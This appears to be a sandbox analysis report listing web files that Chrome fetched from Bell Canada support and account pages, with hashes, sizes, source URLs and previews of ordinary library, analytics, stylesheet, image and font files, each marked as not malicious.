                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):344209
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.203021640408325
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:v6FJyPC8OlTkcRA0YSThaoK5s9X2bDZ95DsnXi1jenWpMeZrRtRbOHQzT27R3xTO:v3CNO0LTharEI9uYjeaRskX
                                                                                                                                                                                                                                                                                                                                      MD5:613A909C38D3F6B6D2388AFCC1BD30FF
                                                                                                                                                                                                                                                                                                                                      SHA1:3E19B31C15CC53AE444400AD529C0AC5902345B5
                                                                                                                                                                                                                                                                                                                                      SHA-256:C653EBB37D3CBBB1807FCD727A0B8E8890973C0687295D4ABC2538F8D7833DF6
                                                                                                                                                                                                                                                                                                                                      SHA-512:1DA8D4966981B76A0111FF17BF096894B1FABD4C086F1DF66CF702B381FE7CD6E4BE03043329CCF1430DAA137D47B5AA99D352265D808CB545A8DC9308B35729
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:!function(n,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=n.document?t(n,!0):function(n){if(!n.document)throw new Error("jQuery requires a window with a document");return t(n)}:t(n)}("undefined"!=typeof window?window:this,function(n,t){"use strict";function br(n,t,i){var r,e,u=(i=i||f).createElement("script");if(u.text=n,t)for(r in oe)(e=t[r]||t.getAttribute&&t.getAttribute(r))&&u.setAttribute(r,e);i.head.appendChild(u).parentNode.removeChild(u)}function ut(n){return null==n?n+"":"object"==typeof n||"function"==typeof n?ri[pr.call(n)]||"object":typeof n}function pi(n){var t=!!n&&"length"in n&&n.length,i=ut(n);return!u(n)&&!rt(n)&&("array"===i||0===t||"number"==typeof t&&0<t&&t-1 in n)}function c(n,t){return n.nodeName&&n.nodeName.toLowerCase()===t.toLowerCase()}function bi(n,t,r){return u(t)?i.grep(n,function(n,i){return!!t.call(n,i,n)!==r}):t.nodeType?i.grep(n,function(n){return n===t!==r}):"string"!=typeof t?i.grep(n,function(n){return-1<ii.c
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.912186294308169
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiRETYo1yqXXl6E0UeQ1CSHI:UrXiQPwqX11eMRo
                                                                                                                                                                                                                                                                                                                                      MD5:9F2BDB83488BC7B786ADFC8279E8E35F
                                                                                                                                                                                                                                                                                                                                      SHA1:7E8FEA3B04DB0B8EA69F40142958295649DC536E
                                                                                                                                                                                                                                                                                                                                      SHA-256:0E88E433A9FE4454ED228A2F0CA00D65D44CFEA33CE5E2B2145C6C4CFB340AFF
                                                                                                                                                                                                                                                                                                                                      SHA-512:4AF6B2990A04CAD602DF8451F2E1150BC611183EC4C15E9FC2A3F823C6E3CAE311C450BD0266E018B2090F2C0159E088F41A5CCD9BBFA71928C02EDD81362C08
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__7 === 'function' && branch_callback__7("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):19814
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.358360149124255
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:+zN6aMy1QFmUEUg46U7CH2cL43uGL8c9TGpxETPLErdldotQ5/MloNEpnwC6x7nE:WN6aMy1SmU9g46U7CH2cL43uGL8c9TGG
                                                                                                                                                                                                                                                                                                                                      MD5:DFD3F717E42E46FBDA7270258B5888F4
                                                                                                                                                                                                                                                                                                                                      SHA1:E00BBF15824E709AEEEABC1DEBCB83608553970F
                                                                                                                                                                                                                                                                                                                                      SHA-256:81775ED284B72059A18E90AEAF0FA1FF300FB35241D82B70F96551A2B6696A9B
                                                                                                                                                                                                                                                                                                                                      SHA-512:CAE93D825B17E91097FBEE99B6DE55272CA17DB5460146F6E87F358E6E1E1C1C9E868EF2B2B4BFED70A78A6DF8BCCD37FC90203E3A7486D5741D4AD46865A420
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://collection.decibelinsight.net/i/14028/693653/c.json
                                                                                                                                                                                                                                                                                                                                      Preview:{"da_websiteId":693653,"da_account_flags":22527,"da_account_flags_orig":22527,"da_sessionId_e":"84E654F18AD2AE89A616AA13A6B4CC6A8F.1","da_leadId_e":"B7D567C29E92EA123347BB99E4B686613C","da_dnsRecord":"collection.decibelinsight.net","da_anonymiseIP":false,"da_ipHandling":0,"da_sessCookieFlags":3,"da_leadCookieFlags":0,"analysisSessFlags":0,"analysisLeadFlags":0,"replaySessFlags":3,"replayLeadFlags":0,"int_state":"","curTime":1730380331,"domains":["24-order-aliant.ids.int.bell.ca","service.aliant.bell.ca","monbell.bell.ca","int.bell.ca","fbsc-www.ids.int.bell.ca","bellaliant.bell.ca","aliant.bell.ca","28-service-aliant.ids.int.bell.ca","pp-orderaliant.bell.ca","pp-bellaliant.bell.ca","28-bellaliant.ids.int.bell.ca","24-service-aliant.ids.int.bell.ca","28-order-aliant.ids.int.bell.ca","www-p1.int.bell.ca","orderinternet.bell.ca","order.aliant.bell.ca","mybell.bell.ca","myaccount.bell.ca","www-p2.int.bell.ca","www.bell.ca","supportinternet.bell.ca","support.bell.ca","soutieninternet.bell.c
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (37462), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):37462
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.35807822929508
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:nu0UAogEz0r+XFq43eBvfbxs0rrsxBusLb7J7BvT4pWeo7MRbKK:u0UndeB3bx5rrsxAw7J7Rvq
                                                                                                                                                                                                                                                                                                                                      MD5:C2298F7F475F4EA09586AA8CE9538C58
                                                                                                                                                                                                                                                                                                                                      SHA1:6B6D89E4C47F6C52C303C2DC88E8D31AED942093
                                                                                                                                                                                                                                                                                                                                      SHA-256:7F2AF60EBBC9FEA1A27AA227E9C3084B0A5F74FD08F35B12843FFC75FF156CF0
                                                                                                                                                                                                                                                                                                                                      SHA-512:81CB02F5EF6638320042DDC88948340AFE2EC48E6D67ACEF73CB3AEA4A893080A9E17307FEBE856E8B3AC0EE5502BFE34AB54D80B8A567B9713229CD2B5D0022
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Resource/web/js/opinion_lab/oo_engine.min.js?ver=201809301812
                                                                                                                                                                                                                                                                                                                                      Preview:/* OnlineOpinion v5.9.0 Released: 11/17/2014. Compiled 11/17/2014 01:01:01 PM -0600 Branch: master 7cffc7b9a0b11594d56b71ca0cb042d9b0fc24f5 Components: Full UMD: disabled The following code is Copyright 1998-2014 Opinionlab, Inc. All rights reserved. Unauthorized use is prohibited. This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. http://www.opinionlab.com */(function(a,b){if(('disabled'==='enabled')&&(typeof define==='function')&&define.amd){define([],b)}else{a.OOo=b()}}(this,function(){window.OOo={__detectBrowser:function(a){var b=Object.prototype.toString.call(window.opera)==='[object Opera]',d/*@cc_on=parseFloat((/MSIE[\s]*([\d\.]+)/).exec(navigator.appVersion)[1])@*/,c={IE:!!d,Opera:b,WebKit:a.indexOf('AppleWebKit/')>-1,Chrome:a.indexOf('Chrome')>-1,Gecko:a.indexOf('Gecko')>-1&&a.indexOf('KHTML')===-1,MobileSafari:/Apple.*Mobile.*Safari/.test(a),iOs:a.indexOf('iPad')>-1||a.indexOf('iPho
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):35941
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.194975772953487
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:eFwx3rZ2GqFKMFCH5IVpwebofqTWnWdWK:eOw6HmeWcK
                                                                                                                                                                                                                                                                                                                                      MD5:0A2C68345EAC0A42F3882636B5D4191C
                                                                                                                                                                                                                                                                                                                                      SHA1:F65931F72166F07032C787C8A8A73F5A2BF6EC26
                                                                                                                                                                                                                                                                                                                                      SHA-256:BE678685D9C0D54739F9AEA3168599BB7EC1DA506D84D565F0AE44A33025DBFD
                                                                                                                                                                                                                                                                                                                                      SHA-512:38E8B2B0B1965D1CA272C21EE2075DFEA1DA30AC41E4626D04DFDF85500C85BE81ADE9406BBE233B30E8878A5ECA52DA45E4142CFE212A0CB8C8EA58A2912A8A
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/styles/RSX/mybell/css/page/registrationFlow-login.css?ver=202410310228
                                                                                                                                                                                                                                                                                                                                      Preview:..rsx-steps-line03 {.. position: relative;.. top: 57px;.. margin: 0 200px;.. height: 2px;..}...rsx-steps-line05 {.. position: relative;.. top: 57px;.. margin: 0 120px;.. height: 2px;..}...rsx-notification_envelope{position:relative; padding-left:70px;}...rsx-notification span.rsx-Envelope-icon:nth-of-type(1){.. position: absolute;.. background: url(https://mybell-qc.akamaized.net/styles/RSX/mybell/css/img/envelope.png?ver=00000000);.. height: 78px;.. width: 81px;.. content: "";.. display: block;.. position: absolute;.. left: 0px;.. top: -29px;..}...left08M_xs{left:-8px;}...height030{height:30px;}...rsx-margin-05-right{margin-right:5px;}...rsx-margin-10-right{margin-right:10px !important;}...rsx-margin-10-bottom{margin-bottom:10px !important;}...rsx-margin-15-bottom{margin-bottom:15px !important;}...rsx-margin-20-bottom{margin-bottom:20px;}...rsx-margin-30-bottom{margin-bottom:30px;}...rsx-margin-15-top{margin-top:15px !important;}...rsx-pad-
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (41530)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):446213
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.634854384537632
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:gKtNePFXIPH6KAU9h9fnTNRobsDi/++dXR8TNMmnBBypMceLFxCTEp5yp+lvHXal:EFYrPT/obyi5XRqNMm1TLkEp9Xwca4W
                                                                                                                                                                                                                                                                                                                                      MD5:2BD78A9A0370D7CD5BD24B3F7A128545
                                                                                                                                                                                                                                                                                                                                      SHA1:73EED1A19CD7A2BE0BA08E0220908A251F3D17BD
                                                                                                                                                                                                                                                                                                                                      SHA-256:D245EFE47B6DD5368D503E24129408EBFAF69BF6FB43198462663AB1880033EC
                                                                                                                                                                                                                                                                                                                                      SHA-512:90506389599E10678076671DB182DEC8F3307DF6AFC3D1B5237CC6F5D8D54BA07C55B5D9DEAC62808A5DE8BF4A48B2AF468D9BBD4AAF35AD9FAFF8C1CA953C83
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://resources.digital-cloud.medallia.ca/wdccan/36793/onsite/generic1730279018395.js
                                                                                                                                                                                                                                                                                                                                      Preview:.window.MDIGITAL=window.MDIGITAL||{};window.MDIGITAL.TRACKER=function(D,e){var t=function(){D.MDIGITAL.md_tracker=D.MDIGITAL.md_tracker||[];if(!MDIGITAL.md_tracker.__SV){var i,o;MDIGITAL.md_tracker._i=[];MDIGITAL.md_tracker.init=function(e,t){function r(e,t){var r=t.split(".");2===r.length&&(e=e[r[0]],t=r[1]);e[t]=function(){e.push([t].concat(Array.prototype.slice.call(arguments,0)))}}var n=MDIGITAL.md_tracker;"undefined"!==typeof t?n=MDIGITAL.md_tracker[t]=[]:t="md_tracker";i=["trackEvent","trackEventLater","flush","set_config"];for(o=0;o<i.length;o++)r(n,i[o]);if(e){MDIGITAL.md_tracker._i.push([e,t])}};MDIGITAL.md_tracker.__SV=1.2}};var r=function(){var t=Array.prototype,e=Object.prototype,i=t.slice,r=e.toString,c=e.hasOwnProperty,u=D.console,n=D.navigator,f=D.document,o=n.userAgent,a;if(n.userAgentData&&n.userAgentData.platform){a=n.userAgentData.getHighEntropyValues(["architecture","bitness","model","platformVersion","uaFullVersion","fullVersionList","wow64"]).then(JSON.stringify)}
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:exported SGML document, ASCII text, with very long lines (24962)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):25115
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.309191635132479
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:NoUjeU5IBNgXPYF+fsjYUbdjIKV8o6jMxldK0Wg+bP32oBWl:NuNgH9LjMkL2oBWl
                                                                                                                                                                                                                                                                                                                                      MD5:C8AFB92BC0D997BA5B673367E69B9FF1
                                                                                                                                                                                                                                                                                                                                      SHA1:9EBB043B6171FED5AE9C3D2FB3B7D2FC97AE24E2
                                                                                                                                                                                                                                                                                                                                      SHA-256:E5F0058D3D737D25B691728BCE12A7D0B77183781C936CA8152E28CACF9E6E3F
                                                                                                                                                                                                                                                                                                                                      SHA-512:58AC9A0EF29DF503F33A9A01AE097F51FC9EF3FA8E1C6795A0E257E6429030F63E96B8D7E042FA973ACB5596E1E2F83F718634F02C81FDFB945EC29F059FD6EE
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/extensions/EPbde2f7ca14e540399dcc1f8208860b7b/AppMeasurement_Module_AudienceManagement.js`..function AppMeasurement_Module_AudienceManagement(e){var t=this;t.s=e;var n=window;n.s_c_in||(n.s_c_il=[],n.s_c_in=0),t._il=n.s_c_il,t._in=n.s_c_in,t._il[t._in]=t,n.s_c_in++,t._c="s_m",t.setup=function(e){n.DIL&&e&&(e.disableDefaultRequest=!0,e.disableCORS=!0,e.secureDataCollection=!1,t.instance=n.DIL.create(e),t.tools=n.DIL.tools)},t.isReady=function(){return!!t.instance},t.getEventCallConfigParams=function(){return t.instance&&t.instance.api&&t.instance.api.getEventCallConfigParams?t.instance.api.getEventCallConfigParams():{}},t.passData=function(e){t.instance&&t.instance.api&&t.instance.api.passData&&t.instance.api.passData(e)}}!function(){"use strict";var r,o,a;"function"!=typeof window.DIL&&(window.DIL=function(n,e){function t(e){return void 0===e||!0===e}function s(){X||(X=!0,j.registerRequest(),K())}var c,i,I,r,u,h,o,a,d,l,f,p,y
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (50645), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):50645
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.225631785461232
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:768:Uzyon9YTQ4ByVdAy4sQzi+E9wieWDL3fo6KeKb2OGxTshwNd0snoCcC3ja5DRo2V:UmPQ4BKAy43zif9wieWNoAywbo
                                                                                                                                                                                                                                                                                                                                      MD5:152A196798A7BC72D28F0E1EF5D1B9E9
                                                                                                                                                                                                                                                                                                                                      SHA1:DA3C3B4B89D5B471AA221590F1B0DCC9EDDBD7D2
                                                                                                                                                                                                                                                                                                                                      SHA-256:C80DA5C0824B5088CAA56C5CB0F4F3304EC58117D851AF1913BA97600FA1D714
                                                                                                                                                                                                                                                                                                                                      SHA-512:25EE05FD0740EDF0714656B612DE0820B5CC7E1A4BDCEECF549344B944DE227A1A5177041810A8F0A608428D34F3875CC6DBEE2B9549EE84EDE5FACD0577708D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/styles/media/core/js/brf3-bottom.js?v=1CxDHk92EiDPECw9adNU7xYmpBY2zYt4MwwbjHG8p1w1
                                                                                                                                                                                                                                                                                                                                      Preview:var StoreLocator,StoreLocatorAutoComplete,GlobalNavLogin,ShoppingCart,GlobalNavigation,VoiceSearch;(function(n){"function"==typeof define&&define.amd?define(["jquery"],n):n(jQuery)})(function(n){n.ui=n.ui||{};n.ui.version="1.12.1";var i=0,t=Array.prototype.slice;n.cleanData=function(t){return function(i){for(var r,u,f=0;null!=(u=i[f]);f++)try{r=n._data(u,"events");r&&r.remove&&n(u).triggerHandler("remove")}catch(e){}t(i)}}(n.cleanData);n.widget=function(t,i,r){var f,u,o,h={},e=t.split(".")[0],s;return t=t.split(".")[1],s=e+"-"+t,r||(r=i,i=n.Widget),n.isArray(r)&&(r=n.extend.apply(null,[{}].concat(r))),n.expr[":"][s.toLowerCase()]=function(t){return!!n.data(t,s)},n[e]=n[e]||{},f=n[e][t],u=n[e][t]=function(n,t){return this._createWidget?(arguments.length&&this._createWidget(n,t),void 0):new u(n,t)},n.extend(u,f,{version:r.version,_proto:n.extend({},r),_childConstructors:[]}),o=new i,o.options=n.widget.extend({},o.options),n.each(r,function(t,r){return n.isFunction(r)?(h[t]=function(){fun
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):387619
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.251894100236539
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:fpWlC/UCNyPe3Y5AavklWOXi8Yz8WuE/tM:fphMeYUXiN8WuE/tM
                                                                                                                                                                                                                                                                                                                                      MD5:BE4E295CDFAE5377F0821F09F3C5A2D7
                                                                                                                                                                                                                                                                                                                                      SHA1:5904E7F001F06699B9599ED93D1F8A017AE03904
                                                                                                                                                                                                                                                                                                                                      SHA-256:D00BCCF7A2C549E6BF80A73C182BF77B1003B41F0A96261D8073E67F2C89F2DF
                                                                                                                                                                                                                                                                                                                                      SHA-512:DA6C4EB1F3C004E02A4A363947C0F646DB06619089B4471F39896C292BFAE32851EE734F7B8DA7186193298CECB4AF3AA1220AE7DE6BAF16B231A0A5AF60FDCB
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/styles/RSX/bell.js?v=TBTGFvqF6oiefphde4dPXTXonS_03gbCMRMbvGlD7Gc1&ver=00000000
                                                                                                                                                                                                                                                                                                                                      Preview:var DeviceAtlas,BELL;(function(n){typeof define=="function"&&define.amd?define(["jquery"],n):n(jQuery)})(function(n){function r(t,i){var r,f,e,o=t.nodeName.toLowerCase();return"area"===o?(r=t.parentNode,f=r.name,!t.href||!f||r.nodeName.toLowerCase()!=="map")?!1:(e=n("img[usemap='#"+f+"']")[0],!!e&&u(e)):(/^(input|select|textarea|button|object)$/.test(o)?!t.disabled:"a"===o?t.href||i:i)&&u(t)}function u(t){return n.expr.filters.visible(t)&&!n(t).parents().addBack().filter(function(){return n.css(this,"visibility")==="hidden"}).length}var f,i,e,t,o;n.ui=n.ui||{};n.extend(n.ui,{version:"1.11.3",keyCode:{BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,RIGHT:39,SPACE:32,TAB:9,UP:38}});n.fn.extend({scrollParent:function(t){var i=this.css("position"),u=i==="absolute",f=t?/(auto|scroll|hidden)/:/(auto|scroll)/,r=this.parents().filter(function(){var t=n(this);return u&&t.css("position")==="static"?!1:f.test(t.css("overflow")+t
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 750 x 651, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):153688
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.991432064162278
                                                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:Qn1kBOGe6pkPTKZzmzVEtvdJdX1GCR5z2CNhTT++0xC6suTzSF6lVzc:W1kBOGe/cZXrR53dT+PxCCTzSF6zc
                                                                                                                                                                                                                                                                                                                                      MD5:F2C6EFCCE7383065B6263B5397ACAA11
                                                                                                                                                                                                                                                                                                                                      SHA1:AD45AD3A78899C52AB732B9A57531AB915ED3053
                                                                                                                                                                                                                                                                                                                                      SHA-256:6E9952709E424B95DB685CBE9C0BB04CA7BD2139678348DB9D8D4F026FDE3C32
                                                                                                                                                                                                                                                                                                                                      SHA-512:BBF3C39A3AA37C28446EAC243E92DFB7469DF4AB0BE11C75BA9C25D5C7531A8E0317E3EB6B3234F4254D32B5856037E6BD0645E34B7D44E4D7768E30550428DE
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/_web/images/support/App_image_shadow_EN.png
                                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR..............$.#....pHYs..!8..!8.E.1`..X.IDATx..w..D......K..M:HU..`GEE.bA..!.....; V..t..;,u..nO...[r...,......In2s..3..(.:::::::::::u..x............S9..........s..+.::::::::::'...........s.`<.....\.7^..$.(......+ ....X...d.M._~.H.|e..v......#.....H.E[_..1.y^..q.....3".-..k..++....-b]G..r#J...OW|..!)B...g....*......@.DD1....).....AAA.D.....e.E..A.l6a..+.EGGGGG.$D....\n......$.(..r..J...(.F......Ze.....}.&A.q.*pAu/..hj !..)....~=.2G...\K.s..ci.aYb}...KD..T.G....H3..60......D.'.%k2..@.P.%./+..^...........%.... ..o&.?..W.0."......B...&.f.V....T.EQp8].].$IF.e.A.|.._.*....9.(.mo.[.,!.e%.sd;%.....9#.5.Ya....=zm....hd....F1Z........&g.. ...B.ny..5L..(.(qnN. ..b.EDQ...h...WPu.Q...*....LF.V....q....ZDQ...Jq.<....E..r.v{.ze$........."I..,...4..\...;...6.t_f%.Q..}Ke.....@+.?].......+.j.........7.T!.%...C...8t..G=...uk_)..w...Q.....q....!..,B:......k...~..o..y.%G..1.....f.b6.(........AD.)..R..V..SPdU>....d.d2a2....&...(b..1..H.. @Jr"&
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):18
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5724312513221195
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:uZuUeB:u5eB
                                                                                                                                                                                                                                                                                                                                      MD5:53AF239EE5D3E261545DEDEDCB6FFD57
                                                                                                                                                                                                                                                                                                                                      SHA1:04CA7E137E1E9FEEAD96A7DF45BB67D5AB3DE190
                                                                                                                                                                                                                                                                                                                                      SHA-256:99EB12F2AB3C4866A353E098FFA3CB7A967E617C49B98480394EC5D8EA92B094
                                                                                                                                                                                                                                                                                                                                      SHA-512:C734E4A5FF5D335A91518DBF47861BDAF8012AF49371DCD2E3350E269C9A5A1CC094114D17C4F5B053F3757B4B07487EBD0D309C91EF97ACF4665CC5D5C9A2D3
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:404 page not found
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 11668, version 1.0
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):11668
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.97975614400697
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:hzdNOIt3ltxaM96W1AKsjucbBVYchHI0Iy8G7oTqShbpXdVgXG:MILyM96uyjA0o0Iy97o/XkXG
                                                                                                                                                                                                                                                                                                                                      MD5:FEA4FFFE21C2B84CDAACE01E6009504C
                                                                                                                                                                                                                                                                                                                                      SHA1:3C431E71A5B149834114AFC745FB049F2159456C
                                                                                                                                                                                                                                                                                                                                      SHA-256:FE9E041B5AE5802CA35044060F054FE65FF2371F02FFAF1D897EC59152F7C2B0
                                                                                                                                                                                                                                                                                                                                      SHA-512:23E068067CA466CC415FA7BE41C4ACD01294820DB97C6857A4DBFFFC622C075060300512324508C56FA55C55454F487DC640003EA0A0562A416B47D010A3BD6D
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/styles/media/support/core/fonts/bellslim_black-webfont.woff2
